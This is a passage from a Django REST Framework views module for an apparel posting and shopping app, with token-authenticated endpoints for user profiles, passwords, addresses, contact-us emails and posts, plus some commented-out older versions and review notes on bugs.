                            user_with_token = Token.objects.get(user=user)
                        except:
                            user_with_token = None
                        if user_with_token is None:
                            token1 = Token.objects.create(user=user)
                            token = token1.key
                        else:
                            Token.objects.get(user=user).delete()
                            token1 = Token.objects.create(user=user)
                            token = token1.key
                        # NOTE(review): unlike the f/g/ap path, this payload omits
                        # login_type and skips the post-update re-read of `user`.
                        userdetail = {
                            "id" : user.id,
                            "token": token,
                            "email" : user.email,
                            "fullname" : user.fullname,
                            "gender" : user.gender,
                            "about_me" : user.about_me,
                            "social_id" : user.social_id,
                            "image": user.image,
                            "user_name" : user.user_name,
                            "date_of_birth" : user.date_of_birth,
                            "phone" : user.phone,
                            "address" : user.address,
                            "deviceId" : user.deviceId,
                            "deviceType" : user.deviceType,
                            "created_time" : user.created_time,
                            "is_profile_created" :user.is_pro_created,
                            "notificationStatus" : user.onoffnotification,
                        }
                        return Response({"message" : loginSuccessMessage,"response":userdetail}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for create user profile
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def CreateProfile(request):
    """Create or edit the authenticated user's profile.

    Multipart PUT: the 'data' field holds JSON (user_name, fullname,
    address, gender, date_of_birth, about_me, is_from_edit) and an
    optional 'image' file. is_from_edit == 1 updates an existing profile
    (allowing the user to keep their own username); otherwise the profile
    is created and is_pro_created is set.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.POST['data'], strict=False)
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='User').exists()
                except Exception as e1:
                    return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    user_name = received_json_data['user_name']
                    fullname = received_json_data['fullname']
                    # canAddPost is True only when both user_name and fullname are non-empty.
                    if user_name == "":
                        canAddPost = False
                        if fullname == "":
                            canAddPost = False
                        else:
                            canAddPost = False
                    else:
                        canAddPost = True
                        if fullname == "":
                            canAddPost = False
                        else:
                            canAddPost = True
                    address = received_json_data['address']
                    gender = received_json_data['gender']
                    date_of_birth = received_json_data['date_of_birth']
                    about_me = received_json_data['about_me']
                    if date_of_birth == "":
                        date_of_birth = None
                    else:
                        date_of_birth = datetime.datetime.strptime(date_of_birth, '%Y-%m-%d')
                    is_from_edit = received_json_data['is_from_edit']
                    if is_from_edit == 1:
                        # Edit flow: reject usernames taken by anyone other than this user.
                        if user_name =="":
                            user1= None
                        else:
                            user1 = User.objects.filter(user_name = user_name).exists()
                            user11 =User.objects.filter(user_name = user_name)
                            for i in user11:
                                if i.id==user.id:
                                    # The name belongs to the requester - not a conflict.
                                    user1=None
                        if user1:
                            return Response({"message" : "username already exist", "status" : "0"}, status=status.HTTP_409_CONFLICT)
                        else:
                            User.objects.filter(id=user.id).update(user_name = user_name,fullname=fullname,address=address,gender=gender,about_me=about_me,date_of_birth = date_of_birth)
                            user1 = User.objects.get(id = user.id)
                            if user1:
                                file = request.FILES.get('image')
                                imageUrl = ""
                                if file is not None:
                                    # Save the uploaded avatar and use its URL in the response.
                                    fs = FileSystemStorage()
                                    filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
                                    uploaded_file_url = fs.url(filename)
                                    User.objects.filter(id = user.id).update(image = uploaded_file_url)
                                    user2 = User.objects.get(id = user.id)
                                    imageUrl = user2.image
                                    userDetail = {
                                        "user_name": user1.user_name,
                                        "fullname" : user1.fullname,
                                        "address": user1.address,
                                        "gender": user1.gender,
                                        "about_me": user1.about_me,
                                        "date_of_birth":user1.date_of_birth,
                                        "image":imageUrl,
                                        "canAddPost": canAddPost
                                    }
                                    return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
                                else:
                                    # No new image: keep the existing one in the response.
                                    userDetail = {
                                        "user_name": user1.user_name,
                                        "fullname" : user1.fullname,
                                        "address": user1.address,
                                        "gender": user1.gender,
                                        "about_me": user1.about_me,
                                        "date_of_birth":user1.date_of_birth,
                                        "image":user.image,
                                        "canAddPost": canAddPost
                                    }
                                    return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
                            else:
                                return Response({"message" : errorMessage}, status=status.HTTP_201_CREATED)
                    else:
                        # Create flow: any existing use of the username is a conflict.
                        if user_name =="":
                            user1= None
                        else:
                            user1 = User.objects.filter(user_name = user_name).exists()
                        if user1:
                            return Response({"message" : "username already exist", "status" : "0"}, status=status.HTTP_409_CONFLICT)
                        else:
                            # NOTE(review): date_of_birth is re-parsed here even though it was
                            # already normalized above - redundant but harmless.
                            date_birth = received_json_data['date_of_birth']
                            if date_birth == "":
                                date_of_birth = None
                            else:
                                date_of_birth = datetime.datetime.strptime(date_birth, '%Y-%m-%d')
                            User.objects.filter(id=user.id).update(user_name = user_name,fullname=fullname,address=address,gender=gender,about_me=about_me,date_of_birth = date_of_birth,is_pro_created =1)
                            user1 = User.objects.get(id = user.id)
                            if user1:
                                file = request.FILES.get('image')
                                imageUrl = ""
                                if file is not None:
                                    fs = FileSystemStorage()
                                    filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
                                    uploaded_file_url = fs.url(filename)
                                    User.objects.filter(id = user.id).update(image = uploaded_file_url)
                                    user2 = User.objects.get(id = user.id)
                                    imageUrl = user2.image
                                userDetail = {
                                    "user_name": user1.user_name,
                                    "fullname" : user1.fullname,
                                    "address": user1.address,
                                    "gender": user1.gender,
                                    "about_me": user1.about_me,
                                    "date_of_birth":user1.date_of_birth,
                                    "image":imageUrl,
                                    "canAddPost": canAddPost
                                }
                                return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
                            else:
                                return Response({"message" : errorMessage}, status=status.HTTP_201_CREATED)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): message says 'Timezone is missing' but this branch
                # actually means the Authorization header was absent - confirm.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================
# api for change password
#==========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def ChangePassword(request):
    """Change the authenticated user's password.

    POST body keys: currentPassword, newPassword. The current password
    must verify and the new one must differ. Returns 200 on success,
    406 for bad/duplicate passwords, 401 for auth failures.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            API_key = request.META.get('HTTP_AUTHORIZATION')
            # Guard clauses replace the old nested if/else pyramid.
            if API_key is None:
                return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
            except Exception:
                return Response({"message": "Session expired!! please login again", "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            if not checkGroup:
                return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            currentPassword = received_json_data['currentPassword']
            if not user.check_password(currentPassword):
                return Response({"message": "Please enter the correct old password", "status": "0"},
                                status=status.HTTP_406_NOT_ACCEPTABLE)
            newPassword = received_json_data['newPassword']
            if currentPassword == newPassword:
                return Response({"message": "Please Enter a Different Password", "status": "0"},
                                status=status.HTTP_406_NOT_ACCEPTABLE)
            # The old code called set_password() without save() (a no-op) and
            # then wrote the hash via filter().update(); one persisted write suffices.
            result = User.objects.filter(id=user.id).update(password=make_password(newPassword))
            if result:
                return Response({"message": "Password updated Successfully"}, status=status.HTTP_200_OK)
            return Response({"message": "Password not updated successfully"},
                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# @csrf_exempt
# @api_view(['PUT'])
# def update_profile_info(request):
# try:
# with transaction.atomic():
# #received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
# received_json_data = json.loads(request.data['data'], strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# a = User.objects.filter(user_name = received_json_data['user_name']).exists()
# if a:
# return Response({"message" : errorUserNameExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
# else:
# user1 = User.objects.filter(id = user.id).update(
# email = received_json_data['email'],
# fullname = received_json_data['fullname'],
# gender = received_json_data['gender'],
# dob =received_json_data['dob'],
# about_me =received_json_data['about_me'],
# address = received_json_data['address'],
# user_name = received_json_data['user_name']
# )
# print(user1)
# if user1:
# file = request.FILES.get('image')
# if file is not None:
# fs = FileSystemStorage()
# filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
# uploaded_file_url = fs.url(filename)
# User.objects.filter(id = user.id).update(image = uploaded_file_url)
# user = User.objects.get(id = user.id)
# user_detail = {"last_login" : user.last_login,
# "user_name" : user.user_name,
# "email" : user.email,
# "fullname" : user.fullname,
# "dob" : user.dob,
# "about_me" : user.about_me,
# "address" : user.address,
# "gender" : user.gender,
# "image":user.image
# }
# print(user_detail)
# return Response({"message" : addSuccessMessage, "status" : "1","user_detail":user_detail}, status=status.HTTP_200_OK)
# else:
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#========================================
# API for add new address
#========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def addAddress(request):
    """Create a new delivery address for the authenticated app user.

    POST body keys: first_name, last_name, phone, address, city,
    postal_code. Returns the stored address fields on success.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body.decode('utf-8'), strict=False)
            # Resolve the caller from the Authorization token; any failure is a 401.
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                requester = Token.objects.get(key=api_key).user
                if not requester.groups.filter(name='User').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            new_address = Addresses.objects.create(
                first_name=payload['first_name'],
                last_name=payload['last_name'],
                phone=payload['phone'],
                address=payload['address'],
                city=payload['city'],
                postal_code=payload['postal_code'],
                user_id=requester.id,
                status=1,
            )
            if new_address is not None:
                return Response({
                    "message": addAddressSuccessMessage,
                    "id": new_address.id,
                    "first_name": new_address.first_name,
                    "last_name": new_address.last_name,
                    "phone": new_address.phone,
                    "city": new_address.city,
                    "postal_code": new_address.postal_code,
                    "address": new_address.address,
                }, status=status.HTTP_200_OK)
            return Response({"message": errorMessage, "status": "0"},
                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# API for delete address
#=========================================
@AppVersion_required
@api_view(['POST'])
def deleteAddress(request):
    """Soft-delete (status=0) one of the authenticated user's addresses.

    POST body key 'address' is the address id to remove.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body.decode('utf-8'), strict=False)
            # Resolve the caller from the Authorization token; any failure is a 401.
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                requester = Token.objects.get(key=api_key).user
                if not requester.groups.filter(name='User').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            # Scope the update to the caller's own rows so users can't delete others' addresses.
            updated = Addresses.objects.filter(user_id=requester.id, id=payload['address']).update(status=0)
            if updated:
                return Response({"message": deleteSuccessMessage}, status=status.HTTP_200_OK)
            return Response({"message": errorMessage, "status": "0"},
                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=====================================
# API for get list of address
#=====================================
@AppVersion_required
@api_view(['GET'])
def getAddresses(request):
    """Return the authenticated user's active addresses.

    The address used on the most recent order (by transaction_time) is
    flagged with default_address=True; all others get False.
    """
    try:
        with transaction.atomic():
            # Resolve the caller from the Authorization token; any failure is a 401.
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                requester = Token.objects.get(key=api_key).user
                if not requester.groups.filter(name='User').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            last_order = OrderTrn.objects.filter(user_id=requester.id).order_by('-transaction_time').first()
            active = Addresses.objects.filter(user_id=requester.id, status=1).order_by('-created_time')
            rows = AddressesSerializer(active, many=True).data
            if rows:
                if last_order:
                    default_id = last_order.address.id
                    for row in rows:
                        row['default_address'] = (row['id'] == default_id)
                else:
                    # No orders yet: nothing qualifies as the default.
                    for row in rows:
                        row['default_address'] = False
            return Response({"message": "Addresses Fetched successfully", "data": rows},
                            status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================
#contact us
#=================================
@AppVersion_required
@api_view(['POST'])
def ContactUsEmail(request):
    """Email the site admin a contact-us message and log it in ContactUs.

    POST body keys: fullname, email, subject, message. Sends an HTML
    email and, if sending succeeds, records the submission.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # checkGroup is necessarily True here (the try above returned otherwise),
            # so the old redundant `if checkGroup:` wrapper and its dead else are gone.
            fullname = received_json_data['fullname']
            # BUG FIX: the old code rebound `email` (the sender's address string)
            # to the EmailMessage object below; use distinct names.
            sender_email = received_json_data['email']
            subject = received_json_data['subject']
            message = received_json_data['message']
            email_body = """\
                <html>
                <head></head>
                <body>
                <h2>%s</h2>
                <p>%s</p>
                <p> This email was sent from: </p>
                <h5>%s</h5>
                <h5>email:%s</h5>
                </body>
                </html>
                """ % (subject, message, fullname, sender_email)
            mail = EmailMessage('Contact Us Mail ! ', email_body, to=['chaudharymark@gmail.com'])
            mail.content_subtype = "html"  # send as HTML, not plain text
            if not mail.send():
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            contact = ContactUs.objects.create(fullname=fullname,
                                               email=sender_email,
                                               subject=subject,
                                               message=message,
                                               user_id=user.id)
            if contact is not None:
                return Response({"status": "1", 'message': 'Email sent successfully.'}, status=status.HTTP_200_OK)
            return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===================================
# logout app user
#===================================
@AppVersion_required
@api_view(['GET'])
def logoutAppUser(request):
    """Log the app user out by deleting their DRF auth token."""
    try:
        with transaction.atomic():
            api_key = request.META.get('HTTP_AUTHORIZATION')
            if api_key is None:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            # A stale/unknown token means the session has already ended.
            try:
                user = Token.objects.get(key=api_key).user
            except:
                user = None
            if user is None:
                return Response({"message": "session Expired ! Please Login Again.", "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            user.auth_token.delete()
            return Response({"message": "Logged out successfully", "status": "1"}, status=status.HTTP_200_OK)
    except Exception as e:
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================
#GET size and colour
#=====================================
@AppVersion_required
@api_view(['GET'])
def getFabricSizeColour(request):
    """Return all fabrics, sizes and colours plus the minimum post price."""
    try:
        with transaction.atomic():
            # Resolve the caller from the Authorization token; any failure is a 401.
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                requester = Token.objects.get(key=api_key).user
                if not requester.groups.filter(name='User').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},
                                status=status.HTTP_401_UNAUTHORIZED)
            payload = {
                "fabric": FabricSerializer(Fabric.objects.all(), many=True).data,
                "size": SizeSerializer(Size.objects.all(), many=True).data,
                "colour": ColourSerializer(Colour.objects.all(), many=True).data,
                # Hard-coded floor price; NOTE(review): consider moving to settings.
                "minimumPrice": 15.78,
            }
            return Response(payload, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==================================
# api for add post
#==================================
# @api_view(['POST'])
# def addPost(request):
# try:
# with transaction.atomic():
# received_json_data = json.loads(request.data['data'], strict=False)
# try:
# API_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=API_key)
# user = token1.user
# checkGroup = user.groups.filter(name='User').exists()
# if checkGroup == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# user1 = User.objects.get(id = user.id)
# print(user1)
# size = list(received_json_data['size'])
# # colour = list(received_json_data['colour'])
# fabric = list(received_json_data['fabric'])
# post = Post.objects.create(price = received_json_data['price'],
# post_description = received_json_data['post_description'],
# user_id = user1.id,
# post_status = 1)
# if post is not None:
# post_count = user1.post_count
# User.objects.filter(id = user.id).update(post_count = post_count+1)
# for element in size:
# RelPostSize.objects.create(post_id = post.id,
# size_id = element)
# for data in fabric:
# RelPostFabric.objects.create(post_id=post.id,
# fabric_id=data)
# file = request.FILES.get('post_image')
# print(file)
# fs = FileSystemStorage()
# filename = fs.save("postimages/"+str(post.id)+"/"+file.name, file)
# uploaded_file_url = fs.url(filename)
# Post.objects.filter(id = post.id).update(post_image = uploaded_file_url)
# return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_201_CREATED)
# else:
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['POST'])
def addPost(request):
    """Create a new post for the authenticated user.

    Multipart POST: the 'data' field holds JSON (price, post_description,
    size list, fabric list, post_type; custom posts also carry
    printingSizefront/printingSizeback in the form data) and
    'post_images' holds the uploaded image files.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.data['data'], strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
            size = list(received_json_data['size'])
            fabric = list(received_json_data['fabric'])
            pst_type = received_json_data['post_type']
            # Shared fields for both post types; the old code duplicated the
            # whole create() call across the two branches.
            post_fields = dict(price=received_json_data['price'],
                               post_description=received_json_data['post_description'],
                               user_id=user.id,
                               created_time=nowTime,
                               post_status=1)
            if pst_type == 'custom':
                # Custom posts additionally record printing sizes and their type.
                post_fields.update(post_printing_size_front=request.data['printingSizefront'],
                                   post_printing_size_back=request.data['printingSizeback'],
                                   post_type=pst_type)
            post = Post.objects.create(**post_fields)
            if post is None:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            User.objects.filter(id=user.id).update(post_count=user.post_count + 1)
            for size_id in size:
                RelPostSize.objects.create(post_id=post.id, size_id=size_id)
            for fabric_id in fabric:
                RelPostFabric.objects.create(post_id=post.id, fabric_id=fabric_id)
            # One storage instance for all uploads (was rebuilt per file);
            # the unused `aa =` binding is gone.
            fs = FileSystemStorage()
            for file in request.FILES.getlist('post_images'):
                filename = fs.save("postimages/" + str(post.id) + "/" + file.name, file)
                PostImage.objects.create(post_images=fs.url(filename), post_id=post.id)
            return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================================
# Get POst by id
#===========================================================
def _build_post_detail(post, viewer=None):
    """Serialize *post* together with its related sizes, fabrics and images.

    When *viewer* (an authenticated User) is supplied, the per-viewer flags
    (post_like, post_fav, added_to_cart) and the viewer's cart count are
    computed; for anonymous access they default to False / 0.
    """
    data = PostSerializer(post).data
    owner = User.objects.get(id=data['user'])
    data['fullname'] = owner.fullname
    data['image'] = owner.image
    data['address'] = owner.address
    # Related lookup tables, flattened into plain dicts for the response body.
    sizes = RelPostSize.objects.values(size_name=F('size__size'), sizeid=F('size__id')).filter(post_id=post.id)
    fabrics = RelPostFabric.objects.values(fabric_name=F('fabric__fabric'), fabricid=F('fabric__id')).filter(post_id=post.id)
    images = PostImage.objects.values('id', 'post_images').filter(post_id=post.id)
    if viewer is None:
        data['cartCount'] = 0
        data['post_like'] = False
        data['post_fav'] = False
        data['added_to_cart'] = False
    else:
        data['cartCount'] = viewer.cartNo
        data['post_like'] = PostLike.objects.filter(user_id=viewer.id, post_id=post.id).exists()
        data['post_fav'] = Favourite.objects.filter(user_id=viewer.id, post_id=post.id).exists()
        # Fix: the original clobbered the Cart membership queryset with
        # user.cartNo, so added_to_cart reflected "cart is non-empty" instead
        # of "this particular post is in the viewer's cart".
        data['added_to_cart'] = Cart.objects.filter(user_id=viewer.id, post_id=post.id).exists()
    data['post_image'] = list(images)
    data['size'] = list(sizes)
    data['fabric'] = list(fabrics)
    return data

@AppVersion_required
@csrf_exempt
@api_view(['GET'])
def getPost(request, pk):
    """Return the full detail payload for an active post (post_status == 1).

    Anonymous callers get the post with neutral per-viewer flags; callers in
    the 'User' group additionally get like/favourite/cart information.
    An inactive or missing post raises DoesNotExist and is reported through
    the generic 500 handler, matching the original behaviour.
    """
    try:
        with transaction.atomic():
            if request.META.get('HTTP_AUTHORIZATION') is None:
                post = Post.objects.get(pk=pk, post_status=1)
                if post:
                    data = _build_post_detail(post)
                    return Response({"message":"post get successfully","data":data}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                try:
                    api_key = request.META.get('HTTP_AUTHORIZATION')
                    token1 = Token.objects.get(key=api_key)
                    user = token1.user
                    if not user.groups.filter(name='User').exists():
                        return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                except:
                    print(traceback.format_exc())
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                post = Post.objects.get(pk=pk, post_status=1)
                if post:
                    data = _build_post_detail(post, viewer=user)
                    return Response({"message":"post get successfully","data":data}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================
# Api for delete post
#====================================
@AppVersion_required
@api_view(['POST'])
def deletePost(request):
    """Soft-delete one of the caller's posts and decrement their post count.

    The post row is kept but its post_status is set to 0; only posts owned
    by the authenticated 'User'-group caller can be deleted.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            owner = User.objects.get(id=user.id)
            post = Post.objects.get(id=payload['post_id'], post_status=1)
            if not post:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            # update() returns the number of rows touched; zero means the
            # post exists but is not owned by the caller.
            updated = Post.objects.filter(id=post.id, user_id=user.id).update(post_status=0)
            if not updated:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            User.objects.filter(id=user.id).update(post_count=owner.post_count - 1)
            return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for like and dislike post
# =====================================
# @csrf_exempt
# @api_view(['POST'])
# def LikedislikePost(request):
# try:
# with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# check_group = user.groups.filter(name='User').exists()
# if check_group == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# post_id = received_json_data['post']
# like_status = int(received_json_data['like_status'])
# post= Post.objects.get(id = post_id,post_status = 1)
# if like_status == 1:
# post_like = PostLike.objects.filter(user_id = user.id,post_id = post.id)
# if not post_like.exists():
# post_like = PostLike.objects.create(user_id = user.id,post_id = post.id)
# total_likes = post.total_likes
# Post.objects.filter(id = post.id).update(total_likes = total_likes+1)
# SendNotification(user.id,)
# return Response({"status": "1", 'message': PostLikedMessage},status=status.HTTP_200_OK)
# else:
# return Response({"message": "Post already liked", "status": "0"},
# status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# elif like_status==0:
# post_dislike = PostLike.objects.filter(user_id=user.id,post_id=post.id)
# if post_dislike.exists():
# post_dislike.delete()
# total_likes = post.total_likes
# Post.objects.filter(id = post.id).update(total_likes = total_likes-1)
# return Response({"status": "1", 'message': PostDislikedMessage},
# status=status.HTTP_200_OK)
# else:
# return Response({"message": "Already not liked ", "status": "0"},
# status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# else:
# return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for favourite and unfavourite post
# =====================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def setFavPost(request):
    """Add or remove an active post from the caller's favourites.

    fav_status == 1 adds the post, fav_status == 0 removes it; any other
    value (or an inactive post) yields an error response.
    """
    try:
        with transaction.atomic():
            payload = json.loads(request.body, strict=False)
            try:
                token_row = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                user = token_row.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            fav_status = int(payload['fav_status'])
            post = Post.objects.get(id=payload['post_id'], post_status=1)
            existing = Favourite.objects.filter(user_id=user.id, post_id=post.id)
            if fav_status == 1:
                if existing.exists():
                    return Response({"message": "already in favourite", "status": "0"},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                Favourite.objects.create(user_id=user.id, post_id=post.id)
                return Response({"status": "1", 'message': setFavouriteMessage},status=status.HTTP_200_OK)
            elif fav_status == 0:
                if not existing.exists():
                    return Response({"message": "Already not favourite ", "status": "0"},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                existing.delete()
                return Response({"status": "1", 'message': setUnfavouriteMessage},
                                status=status.HTTP_200_OK)
            else:
                return Response({"message": "This post has been disabled by admin", "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : "This post has been disabled by admin", "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================
# Api for get list of favourite posts
#=============================================
@AppVersion_required
